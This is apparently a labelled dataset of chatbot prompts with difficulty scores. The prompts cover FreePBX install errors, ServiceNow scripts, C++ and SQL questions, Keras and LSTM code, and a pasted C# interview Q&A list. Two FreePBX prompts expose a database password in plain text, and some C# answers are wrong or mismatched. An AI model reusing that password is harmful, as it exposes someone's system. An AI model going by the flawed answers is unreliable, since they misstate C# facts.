Checking if SELinux is enabled…Its not (good)!
Reading /etc/asterisk/asterisk.conf…Done
Checking if Asterisk is running and we can talk to it as the ‘asterisk’ user…Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it…Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install…Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions…Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string query, ?int
fetchMode = null, mixed …$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
c2a73d5b2e1b77642d6cd473dd94b0b7
|
{
"intermediate": 0.4554811120033264,
"beginner": 0.3687116205692291,
"expert": 0.17580726742744446
}
|
46,720
|
Ошибка:
[root@localhost ~]# rm freepbx
rm: cannot remove 'freepbx': Is a directory
|
80d6b2310b2e9288c9100ba605480fef
|
{
"intermediate": 0.3496999740600586,
"beginner": 0.32951170206069946,
"expert": 0.32078832387924194
}
|
46,721
|
Dear GPT-4-Turbo, write me code that does a LOT of stuff that does nothing but use my pc's resources, only to at the end to print out "Man, idk. Too hard."
|
06df130d3f5a8f1f2c8a1829371932b3
|
{
"intermediate": 0.35028061270713806,
"beginner": 0.4122452139854431,
"expert": 0.2374742329120636
}
|
46,722
|
django get host name of requests.
|
45f2cdda432d9886201b2a7057e76611
|
{
"intermediate": 0.5003438591957092,
"beginner": 0.18938149511814117,
"expert": 0.3102746903896332
}
|
46,723
|
i uploaded background image for service portal, and now i need to edit it to fit on the entire background, somecontents were missing in the image to be displayed
|
98d79fd07e1bac9c2754de9d4aa40516
|
{
"intermediate": 0.32987064123153687,
"beginner": 0.23681196570396423,
"expert": 0.4333174228668213
}
|
46,724
|
if approval status is not yet request then update worknotes "not reviewed" in RITM servicenow through business rule
|
a9e3293b575e4aeeb45a16ead3688cda
|
{
"intermediate": 0.43870821595191956,
"beginner": 0.2271784394979477,
"expert": 0.33411329984664917
}
|
46,725
|
in python this GPIB11::9::INSTR I want to get the 9 how to do it
|
635d9c8d3edfdfe4c1f335f5a269db98
|
{
"intermediate": 0.3439564108848572,
"beginner": 0.22977416217327118,
"expert": 0.42626944184303284
}
|
46,726
|
Что за ошибка
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Error!
Error communicating with Asterisk. Ensure that Asterisk is properly installed and running as the asterisk user
Asterisk appears to be running as root
Try starting Asterisk with the './start_asterisk start' command in this directory
|
5416efa783b57885921d70d5e4df0244
|
{
"intermediate": 0.3567330241203308,
"beginner": 0.36019575595855713,
"expert": 0.2830711603164673
}
|
46,727
|
#include <bits/stdc++.h>
#define M 100002
using namespace std;
int dem[M];
struct xau{ string x; int vt;};
xau s[M];
int demso(xau a){
int res=0;
if(a.x.size()<1)return 0;
for(int i=0;i<a.x.size();i++)
if(a[i].x>='0'&&a[i].x<='9') res++;
return res;
}
bool cmp (xau a,xau b){
if(demso(a)<demso(b)|| demso(a)==demso(b)&& a.vt<b.vt) return true;
return false;}
int main()
{
ios_base::sync_with_stdio(false);
cin.tie(0); cout.tie(0);
freopen("BAI3.INP", "r",stdin);
freopen("BAI3.OUT", "w",stdout);
int n;
cin>>n;
for(int i=1;i<=n;i++) {cin>>s[i]; s[i].vt=i;}
sort (s+1,s+n+1,cmp);
for(int i=1;i<=n;i++)cout<<s[i]<< '\n';
return 0;
}
|
a5b91c599c90c193b080402c2d17f6a9
|
{
"intermediate": 0.29181697964668274,
"beginner": 0.5319371819496155,
"expert": 0.17624574899673462
}
|
46,728
|
Что за ошибка:
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 20.7.0
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
Empty asterisk Database going to populate it
Updating tables admin, ampusers, cronmanager, featurecodes, freepbx_log, freepbx_settings, globals, module_xml, modules, notifications, cron_jobs...Done
Empty asteriskcdrdb Database going to populate it
Initializing FreePBX Settings
Changing AMPWEBROOT [/var/www/html] to match what was given at install time: /usr/share/nginx/html
Changing AMPMGRUSER [admin] to match what was given at install time: a1e9fcec4670fb9d130a94a58c30d6a1
Changing AMPMGRPASS [amp111] to match what was given at install time: 42cf523cec5432cc5197e40261450a62
Finished initalizing settings
Copying files (this may take a bit)....
17033/17033 [============================] 100%
Done
bin is: /var/lib/asterisk/bin
sbin is: /usr/sbin
Symlinking /var/lib/asterisk/bin/fwconsole to /usr/sbin/fwconsole ...Done
Symlinking /var/lib/asterisk/bin/amportal to /usr/sbin/amportal ...Done
Finishing up directory processes...Done!
Running variable replacement...Done
Creating missing #include files...Done
Setting up Asterisk Manager Connection...Done
Running through upgrades...
Checking for upgrades..
No further upgrades necessary
Finished upgrades
Setting FreePBX version to 17.0.15.2...Done
Writing out /etc/amportal.conf...Done
Writing out /etc/freepbx.conf...Done
Chowning directories...
Taking too long? Customize the chown command, See http://wiki.freepbx.org/display/FOP/FreePBX+Chown+Conf
Setting Permissions...
Setting base permissions...Done in 1 seconds
Setting specific permissions...
685 [============================]
Finished setting permissions
Done
Installing framework...
Unable to install module framework:
- PHP version 8.2.0 or higher is required, you have 8.1.24
Updating Hooks...Done
Chowning directories...Done
Unable to install module framework:
- PHP version 8.2.0 or higher is required, you have 8.1.24
Updating Hooks...Done
Chowning directories...Done
Done
Building Packaged Scripts...Done
Trusting FreePBX...Trusted
Installing base modules...Updating tables trunks, pjsip, sip, dahdi, iax, indications_zonelist, devices, users, incoming, dahdichandids, outbound_route_patterns, outbound_route_sequence, outbound_route_trunks, outbound_routes, outbound_route_email, trunk_dialpatterns...Done
Starting Call Transfer Monitoring Service
PM2 is not installed/enabled. Unable to start Call transfer monitoring
In install.php line 22:
Undefined array key "ASTVERSION"
moduleadmin [-f|--force] [-d|--debug] [--edge] [--ignorecache] [--stable] [--color] [--skipchown] [-e|--autoenable] [--skipdisabled] [--snapshot SNAPSHOT] [--format FORMAT] [-R|--repo REPO] [-t|--tag TAG] [--skipbreakingcheck] [--sendemail] [--onlystdout] [--] [<args>...]
In Process.php line 272:
The command "'/usr/sbin/fwconsole' 'ma' 'install' 'core' 'dashboard' 'sipsettings' 'voicemail' 'certman'" failed.
Exit Code: 2(Misuse of shell builtins)
Working directory: /root/freepbx
Output:
================
Error Output:
================
install [--dbengine DBENGINE] [--dbname DBNAME] [--dbhost DBHOST] [--dbport DBPORT] [--cdrdbname CDRDBNAME] [--dbuser DBUSER] [--dbpass DBPASS] [--user USER] [--group GROUP] [--dev-links] [--skip-install] [--webroot WEBROOT] [--astetcdir ASTETCDIR] [--astmoddir ASTMODDIR] [--astvarlibdir ASTVARLIBDIR] [--astagidir ASTAGIDIR] [--astspooldir ASTSPOOLDIR] [--astrundir ASTRUNDIR] [--astlogdir ASTLOGDIR] [--ampbin AMPBIN] [--ampsbin AMPSBIN] [--ampcgibin AMPCGIBIN] [--ampplayback AMPPLAYBACK] [-r|--rootdb] [-f|--force]
|
de7914802c56809693291b03caf3b9fa
|
{
"intermediate": 0.3576268255710602,
"beginner": 0.2880428433418274,
"expert": 0.3543303310871124
}
|
46,729
|
i have the following code to train a lstm model on my historical crypto dataset:
# %%
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# %%
# Load the dataset
df = pd.read_csv(“your_crypto_data.csv”)
# Selecting the 'Close' column and converting it to numpy array
close_prices = df['Close'].values.reshape(-1, 1)
# Scale the data between 0 and 1
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(close_prices)
# Creating the dataset with 30 timesteps
x = []
y = []
for i in range(30, len(scaled_data)):
x.append(scaled_data[i-30:i, 0])
y.append(scaled_data[i, 0])
# %%
x, y = np.array(x), np.array(y)
# Splitting the dataset into training and testing
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=42)
# %%
# Reshape the data to fit the LSTM layer
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))
# %%
Now, let's build the LSTM model:
model = Sequential()
# Adding the first LSTM layer with some Dropout regularisation
model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1], 1)))
model.add(Dropout(0.2))
# Adding a second LSTM layer and some Dropout regularisation
model.add(LSTM(units=50, return_sequences=False))
model.add(Dropout(0.2))
# Adding the output layer
model.add(Dense(units=1))
# Compiling the RNN
model.compile(optimizer='adam', loss='mean_squared_error')
# Fitting the RNN to the Training set
model.fit(x_train, y_train, epochs=100, batch_size=32)
# %%
predicted_prices = model.predict(x_test)
predicted_prices = scaler.inverse_transform(predicted_prices) # Undo the scaling
# Visualising the results
plt.plot(scaler.inverse_transform(y_test.reshape(-1, 1)), color='red', label='Real Crypto Price')
plt.plot(predicted_prices, color='blue', label='Predicted Crypto Price')
plt.title('Crypto Price Prediction')
plt.xlabel('Time')
plt.ylabel('Crypto Price')
plt.legend()
plt.show()
currently the model train on just close price
but i have other features in my dataset,like open,close,high, volume and...
update the code so the model train on all features on my dataset and predict close price of next day based on last 30 days
|
8f2840d1ce17ef2b6ca7a5f3d3c250d4
|
{
"intermediate": 0.3789866864681244,
"beginner": 0.32348233461380005,
"expert": 0.2975309193134308
}
|
46,730
|
1. What is C#?
C# is an object-oriented programming language compiled by the .Net framework to generate Microsoft Intermediate Language.
Can multiple catch blocks be executed?
No, you cannot execute multiple catch blocks of the same type.
2. What is the difference between static, public, and void?
Public declared variables can be accessed from anywhere in the application. Static declared variables can be accessed globally without needing to create an instance of the class. Void is a type modifier which states the method and is used to specify the return type of a method in C#.
3. What is an object?
An object is a class instance that can be used to access class methods. The "New" keyword can be used to construct an object.
4. Define Constructors.
A constructor is a member function with the same name as its class. The constructor is automatically invoked when an object is created. While the class is being initialized, it constructs all the values of data members.
5. What are Jagged Arrays?
The Array which comprises elements of type array is called Jagged Array. The elements in Jagged Arrays can be of various dimensions and sizes.
6. What is the difference between out and ref parameters?
When an argument is passed as a ref, it must be initialized before it can be passed to the method. An out parameter, on the other hand, need not to be initialized before passing to a method.
7. What is the benefit of ‘using’ statement in C#?
The ‘using’ statement can be used in order to obtain a resource for processing before automatically disposing it when execution is completed.
8. What is serialization?
In order to transport an object through a network, we would need to convert it into a stream of bytes. This process is called Serialization.
9. Can “this” command be used within a static method?
No. This is because only static variables/methods can be used in a static method.
Want a Top Software Development Job? Start Here!
Full Stack Developer - MERN StackEXPLORE PROGRAMWant a Top Software Development Job? Start Here!
10. Differentiate between Break and Continue Statement.
Continue statement - Used in jumping over a particular iteration and getting into the next iteration of the loop.
Break statement - Used to skip the next statements of the current iteration and come out of the loop.
11. List the different types of comments in C#.
The different types of comments in C# are:
XML comments
Example -
/// example of XML comment
Single Line comments
Example -
// example of single-line comment
Multi-line comments
Example -
/* example of an
multiline comment */
12. Explain the four steps involved in the C# code compilation.
Four steps of code compilation in C# include -
Source code compilation in managed code.
Newly created code is clubbed with assembly code.
The Common Language Runtime (CLR) is loaded.
Assembly execution is done through CLR.
13. Discuss the various methods to pass parameters in a method.
The various methods of passing parameters in a method include -
Output parameters: Lets the method return more than one value.
Value parameters: The formal value copies and stores the value of the actual argument, which enables the manipulation of the formal parameter without affecting the value of the actual parameter.
Reference parameters: The memory address of the actual parameter is stored in the formal argument, which means any change to the formal parameter would reflect on the actual argument too.
14. Name all the C# access modifiers.
The C# access modifiers are -
Private Access Modifier - A private attribute or method is one that can only be accessed from within the class.
Public Access Modifier - When an attribute or method is declared public, it can be accessed from anywhere in the code.
Internal Access Modifier - When a property or method is defined as internal, it can only be accessible from the current assembly point of that class.
Protected Access Modifier - When a user declares a method or attribute as protected, it can only be accessed by members of that class and those who inherit it.
15. Mention all the advantages of C#.
The following are the advantages of C# -
C# is component-oriented.
It is an object-oriented language.
The syntax is really easy to grasp.
It is easier to learn.
C# is part of the framework called .NET
Want a Top Software Development Job? Start Here!
Full Stack Developer - MERN StackEXPLORE PROGRAMWant a Top Software Development Job? Start Here!
16. Mention the important IDEs for C# development provided by Microsoft.
The following IDEs’ are useful in C# development -
MonoDevelop
Visual Studio Code (VS Code)
Browxy
Visual Studio Express (VSE)
Visual Web Developer (VWD)
17. Why do we use C# language?
Below are the reasons why we use the C# language -
C# is a component-oriented language.
It is easy to pass parameters in the C# language.
The C# language can be compiled on many platforms.
The C# language follows a structured approach.
It is easy to learn and pick up.
The C# language produces really efficient and readable programmes.
18. Mention the features of C# briefly.
Some of the main features of C# are -
C# is a safely typed and managed language.
C# is object-oriented in nature.
C# is a Cross-platform friendly language.
C# is a platform-independent language when it comes to compilation.
C# is general purpose in nature.
C# is used in implementing Destructors and Constructors.
C# is part of the .NET framework.
C# is an easy-to-learn and easy-to-grasp language.
C# is a structured language.
19. What is meant by Unmanaged or Managed Code?
In simple terms, managed code is code that is executed by the CLR (Common Language Runtime). This means that every application code is totally dependent on the .NET platform and is regarded as overseen in light of it. Code executed by a runtime programme that is not part of the .NET platform is considered unmanaged code. Memory, security, and other activities related to execution will be handled by the application's runtime.
20. What is meant by an Abstract Class?
It's a type of class whose objects can't be instantiated, and it's signified by the term 'abstract'. It consists of a methodology or a single approach.
21. Differentiate between finalize blocks and finalize.
Once the try and catch blocks have been completed, the finalize block is called since it is used for exception handling. No matter if the exception has been captured, this block of code is run. In general, the code in this block is cleaner.
Just before garbage collection, the finalize method is called. The main priorities of the finalize method are to clean up unmanaged code, which is automatically triggered whenever an instance is not re-called.
Preparing Your Blockchain Career for 2024
Free Webinar | 5 Dec, Tuesday | 9 PM ISTREGISTER NOWPreparing Your Blockchain Career for 2024
22. What is meant by an Interface?
An interface is a class that does not have any implementation. Only the declarations of events, properties, and attributes are included.
23. What is meant by a Partial Class?
A partial class effectively breaks a class's definition into various classes in the same or other source code files. A class definition can be written in numerous files, but it is compiled as a single class at runtime, and when a class is formed, all methods from all source files can be accessed using the same object. The keyword 'partial' denotes this.
24. What is the difference between read-only and constants?
During the time of compilation, constant variables are declared as well as initialized. It’s not possible to change this particular value later. On the other hand, read-only is used after a value is assigned at run time.
25. What is an interface class?
An interface class is an abstract class with only public abstract methods. Only declaration is there in these methods, but not the definition. They must be implemented in the inherited classes.
26. What are reference types and value types?
A value type holds a data value inside its memory space. Reference type, on the other hand, keeps the object’s address where the value is stored. It is, essentially, a pointer to a different memory location.
27. What are User Control and Custom Control?
Custom Controls are produced as compiled code. These are easy to use and can be added to the toolbox. Developers can drag and drop these controls onto their web forms. User Controls are almost the same as ASP include files. They are also easy to create. User controls, however, can’t be put in the toolbox. They also can’t be dragged and dropped from it.
28. What are sealed classes in C#?
When a restriction needs to be placed on the class that needs to be inherited, sealed classes are created. In order to prevent any derivation from a class, a sealed modifier is used. Compile-time error occurs when a sealed class is forcefully specified as a base class.
29. What is method overloading?
Method overloading is the process of generating many methods in the same class with the same name but distinct signatures. The compiler utilizes overload resolution to identify which method to invoke when we compile.
30. What is the difference between Arraylist and Array?
An array only has items of the same type and its size if fixed. Arraylist is similar but it does not have a fixed size.
31. Is it possible for a private virtual method to be overridden?
A private virtual method cannot be overridden as it can’t be accessed outside the class.
32. Describe the accessibility modifier “protected internal”.
Variables or methods that are Protected Internal can be accessed within the same assembly as well as from the classes which have been derived from the parent class.
33. What are the differences between System.String and System.Text.StringBuilder classes?
System.String is absolute. When a string variable’s value is modified, a new memory is assigned to the new value. The previous memory allocation gets released. System.StringBuilder, on the other hand, is designed so it can have a mutable string in which a plethora of operations can be performed without the need for allocation of a separate memory location for the string that has been modified.
34. What’s the difference between the System.Array.CopyTo() and System.Array.Clone() ?
In the Clone() method, a new array object is created, with all the original Array elements using the CopyTo() method. Essentially, all the elements present in the existing array get copied into another existing array.
35. How can the Array elements be sorted in descending order?
You can use the Using Sort() methods and then Reverse() method.
36. What’s the difference between an abstract and interface class?
All methods in interfaces have only a declaration but no definition. We can have some strong methods in an abstract class. All methods in an interface class are public. Private methods may exist in an abstract class.
Want a Top Software Development Job? Start Here!
Full Stack Developer - MERN StackEXPLORE PROGRAMWant a Top Software Development Job? Start Here!
37. What is the difference between Dispose() and Finalize()methods?
Dispose() is used when an object is required to release any unmanaged resources in it. Finalize(), on the other hand, doesn’t assure the garbage collection of an object even though it is used for the same function.
38. What are circular references?
When two or more resources are dependent on each, it causes a lock condition, and the resources become unusable. This is called a circular reference.
39. What are generics in C# .NET?
In order to reduce code redundancy, raise type safety, and performance, generics can be used in order to make code classes that can be reused. Collection classes can be created using generics.
40. What is an object pool in .NET?
A container that has objects which are ready to be used is known as an object pool. It helps in tracking the object which is currently in use and the total number of objects present in the pool. This brings down the need for creating and re-creating objects.
41. List down the most commonly used types of exceptions in .NET
Commonly used types of exceptions in .NET are:
ArgumentException
ArithmeticException
DivideByZeroException
OverflowException
InvalidCastException
InvalidOperationException
NullReferenceException
OutOfMemoryException
StackOverflowException
42. What are Custom Exceptions?
In some cases, errors have to be handled according to user requirements. Custom exceptions are used in such cases.
43. What are delegates?
Delegates are essentially the same as function pointers in C++. The main and only difference between the two is delegates are type safe while function pointers are not. Delegates are essential because they allow for the creation of generic type-safe functions.
44. What is the difference between method overriding and method overloading?
In method overriding, the relevant method definition is replaced in the derived class, which changes the method behavior. When it comes to method overloading, a method is created with the same name and is in the same class while having different signatures.
45. How do you inherit a class into another class in C#?
In C#, colon can be used as an inheritance operator. You need to place a colon and follow it with the class name.
46. What are the various ways that a method can be overloaded??
Different data types can be used for a parameter in order for a method to be overloaded; different orders of parameters as well as different numbers of parameters can be used.
47. Why can't the accessibility modifier be specified for methods within the interface?
In an interface, there are virtual methods which do not come with method definition. All the methods present are to be overridden in the derived class. This is the reason they are all public.
48. How can we set the class to be inherited, but prevent the method from being overridden?
To set the class to be inherited, it needs to be declared as public. The method needs to be sealed to prevent any overrides.
49. What happens if the method names in the inherited interfaces conflict?
A problem could arise when the methods from various interfaces expect different data. But when it comes to the compiler itself, there shouldn’t be an issue.
50. What is the difference between a Struct and a Class?
Structs are essentially value-type variables, whereas classes would be reference types.
51. How to use nullable types in .Net?
When either normal values or a null value can be taken by value types, they are called nullable types.
52. How can we make an array with non-standard values?
An array with non-default values can be created using Enumerable.Repeat.
53. What is the difference between “is” and “as” operators in c#?
An “is” operator can be used to check an object’s compatibility with respect to a given type, and the result is returned as a Boolean. An “as” operator can be used for casting an object to either a type or a class.
54. What is a multicast delegate?
Multicast delegate is when a single delegate comes with multiple handlers. Each handler is assigned to a method.
55. What are indexers in C# .NET?
In C#, indexers are called smart arrays. Indexers allow class instances to be indexed in the same way as arrays do.
56. What is the distinction between "throw" and "throw ex" in.NET?
“Throw” statement keeps the original error stack. But “throw ex” keeps the stack trace from their throw point.
57. What are C# attributes and its significance?
C# gives developers an option to define declarative tags on a few entities. For instance, class and method are known as attributes. The information related to the attribute can be retrieved during runtime by taking the help of Reflection.
58. In C#, how do you implement the singleton design pattern?
In a singleton pattern, a class is allowed to have only one instance, and an access point is provided to it globally.
Want a Top Software Development Job? Start Here!
Full Stack Developer - MERN StackEXPLORE PROGRAMWant a Top Software Development Job? Start Here!
59. What's the distinction between directcast and ctype?
If an object is required to have the run-time type similar to a different object, then DirectCast is used to convert it. When the conversion is between the expression as well as the type, then Ctype is used.
60. Is C# code managed or unmanaged code?
C# is a managed code as the runtime of Common language can compile C# code to Intermediate language.
61. What is a Console application?
An application that is able to run in the command prompt window is called a console application.
62. What are namespaces in C#?
Namespaces allow you to keep one set of names that is different from others. A great advantage of namespace is that class names declared in one namespace don’t clash with those declared in another namespace.
63. What is the distinction between the Dispose() and Finalize() methods?
Namespaces, interfaces, structures, and delegates can all be members.
64. Write features of Generics in C#?
Generics is a technique to improve your program in various ways including creating generic classes and reusing code.
65. Difference between SortedList and SortedDictionary in C#.
SortedList is a collection of value pairs sorted by their keys. SortedDictionary is a collection to store the value pairs in the sorted form, in which the sorting is done on the key.
66. What is Singleton design pattern in C#?
Singleton design pattern in C# has just one instance that gives global access to it.
67. What is tuple in C#?
Tuple is a data structure to represent a data set that has multiple values that could be related to each other.
68. What are Events?
An event is a notice that something has occurred.
69. What is the Constructor Chaining in C#?
With Constructor Chaining, an overloaded constructor can be called from another constructor. The constructor must belong to the same class.
70. What is a multicasting delegate in C#?
Multicasting of delegates helps users to point to more than one method in a single call.
71. What are Accessibility Modifiers in C#?
Access Modifiers are terms that specify a program's member, class, or datatype's accessibility.
72. What is a Virtual Method in C#?
In the parent class, a virtual method is declared that can be overridden in the child class. We construct a virtual method in the base class using the virtual keyword, and that function is overridden in the derived class with the Override keyword.
73. What is Multithreading with .NET?
Multi-threading refers to the use of multiple threads within a single process. Each thread here performs a different function.
74. In C#, what is a Hash table class?
The Hash table class represents a collection of key/value pairs that are organized based on the hash code of the key.
75. What is LINQ in C#?
LINQ refers to Language Integrated Query. It provides .NET languages (like C#) the ability to generate queries to retrieve data from the data source.
76. Why can't a private virtual procedure in C# be overridden?
Private virtual methods are not accessible outside of the class.
77. What is File Handling in C#?
File handling includes operations such as creating the file, reading from the file, and appending the file, among others.
78. What do you understand about Get and Set Accessor properties?
In C#, Get and Set are termed accessors because they use properties. Such private fields are accessed via accessors.
79. What is the Race condition in C#?
When 2 threads access the same resource and try to change it at the same time, we have a race condition.
80. Why are Async and Await used in C#?
Asynchronous programming processes execute independently of the primary or other processes. Asynchronous methods in C# are created using the Async and Await keywords.
81. What is an Indexer in C#?
An indexer is a class property that allows you to access a member variable of another class using array characteristics.
82. What is Thread Pooling in C#?
In C#, a Thread Pool is a group of threads. These threads are used to do work without interfering with the principal thread's operation.
83. What information can you provide regarding the XSD file in C#?
XSD stands for XML Schema Definition. The XML file can have any attributes and elements if there is no XSD file associated with it.
84. What are I/O classes in C#?
In C#, the System.IO namespace contains multiple classes that are used to conduct different file operations such as creation, deletion, closure, and opening.
85. What exactly do you mean by regular expressions in C#?
A regular expression is a pattern that can be used to match a set of input. Constructs, character literals, and operators are all possible.
Bu soruları örnek kodlar ile birlikte İngilizce cevapla
|
87b9015e0310dd2c76ac05ad504e7ec2
|
{
"intermediate": 0.4112328886985779,
"beginner": 0.35719913244247437,
"expert": 0.23156793415546417
}
|
46,731
|
1. Write a SQL query to find the second highest salary from the table emp. (Column name – id, salary)
|
f2c6ce198ca6e87d9ce2bb293cbb2f49
|
{
"intermediate": 0.40115365386009216,
"beginner": 0.25919076800346375,
"expert": 0.3396556079387665
}
|
46,732
|
#include <bits/stdc++.h>
#define M 100002
using namespace std;
int dem[M];
struct xau{
string x;
int vt;
};
xau s[M];
int demso(xau a){
int res=0;
if(a.x.size()<1)return 0;
for(int i=0;i<a.x.size();i++)
if(a.x[i]>='0'&&a.x[i]<='9') res++;
return res;
}
bool cmp (xau a,xau b){
if(demso(a)<demso(b)|| demso(a)==demso(b)&& a.vt>b.vt) return true;
return false;}
int main()
{
ios_base::sync_with_stdio(false);
cin.tie(0); cout.tie(0);
freopen("BAI3.INP", "r",stdin);
freopen("BAI3.OUT", "w",stdout);
int n;
cin>>n;
for(int i=1;i<=n;i++) {cin>>s[i].x; s[i].vt=i;}
sort (s+1,s+n+1,cmp);
for(int i=1;i<=n;i++) cout << demso<< s[i]. x<<'\n';
//for(int i=1;i<=n;i++)cout<<s[i].x<< '\n';
return 0;
}
|
01beba47a4d28c16a1f9fec10fec2015
|
{
"intermediate": 0.3091809153556824,
"beginner": 0.4919096827507019,
"expert": 0.19890941679477692
}
|
46,733
|
I’ve a catalog item which will generate 6 SC tasks. For one of the SC task, user should not be able to close the SC task without an attachment. How can I proceed with the solution on this. Help me to provide any scrips.
|
58727a2adeb20719473d041d64dbb10c
|
{
"intermediate": 0.27944621443748474,
"beginner": 0.3443250358104706,
"expert": 0.37622880935668945
}
|
46,734
|
I want a List action(declarative action) on click of which I will get a popup and in popup I will be able to attach a document in workspace view.
After submitting Attachment of documents, It is get attached to to multiple records.
If I will get any code, it will be a very good help for me.
|
3a578d3699ac80c8eb3865234480f413
|
{
"intermediate": 0.38570186495780945,
"beginner": 0.3150084912776947,
"expert": 0.29928967356681824
}
|
46,735
|
how can I make my c++ program on linux output a final message before termination if an access violation happens?
|
115d4b025107ecaa127074155280ccb3
|
{
"intermediate": 0.5213168263435364,
"beginner": 0.1934683918952942,
"expert": 0.28521469235420227
}
|
46,736
|
i have following code :
input_shape = (72, 6427)
inputs = Input(shape=(input_shape,))
x = Dense(6427, activation='relu', input_shape=(input_shape,)) (inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
and im getting this error:
{
"name": "ValueError",
"message": "Invalid dtype: tuple",
"stack": "---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[8], line 3
1 input_shape = (70, 6427)
----> 3 inputs = Input(shape=(input_shape,))
6 x = Dense(6427, activation='relu', input_shape=(input_shape,)) (inputs)
7 x = Dropout(0.25) (x)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\layers\\core\\input_layer.py:143, in Input(shape, batch_size, dtype, sparse, batch_shape, name, tensor)
89 @keras_export([\"keras.layers.Input\", \"keras.Input\"])
90 def Input(
91 shape=None,
(...)
97 tensor=None,
98 ):
99 \"\"\"Used to instantiate a Keras tensor.
100
101 A Keras tensor is a symbolic tensor-like object, which we augment with
(...)
141
|
49bf33e7da0d8570c73c456d4627dec9
|
{
"intermediate": 0.3208302855491638,
"beginner": 0.38221466541290283,
"expert": 0.29695501923561096
}
|
46,737
|
I want a List action(declarative action) on click of which I will get a popup and in popup I will be able to attach a document in workspace view.
After submitting Attachment of documents, It is get attached to to multiple records.
If I will get any code, it will be a very good help for me.
|
3b91272c69f95f8aa98352ee064352be
|
{
"intermediate": 0.38570186495780945,
"beginner": 0.3150084912776947,
"expert": 0.29928967356681824
}
|
46,738
|
my code:
# %%
import os
import numpy as np
import pandas as pd
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from tensorflow.keras.layers import Input, Dropout
from tensorflow.keras import Model
# %%
def data_generator(file_paths, batch_size, train=True, scaler=None):
while True: # Loop forever so the generator never terminates
# Shuffle file paths to ensure random distribution of data across files
np.random.shuffle(file_paths)
for file_path in file_paths:
data = pd.read_csv(file_path)
# Split features and labels
X = data.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
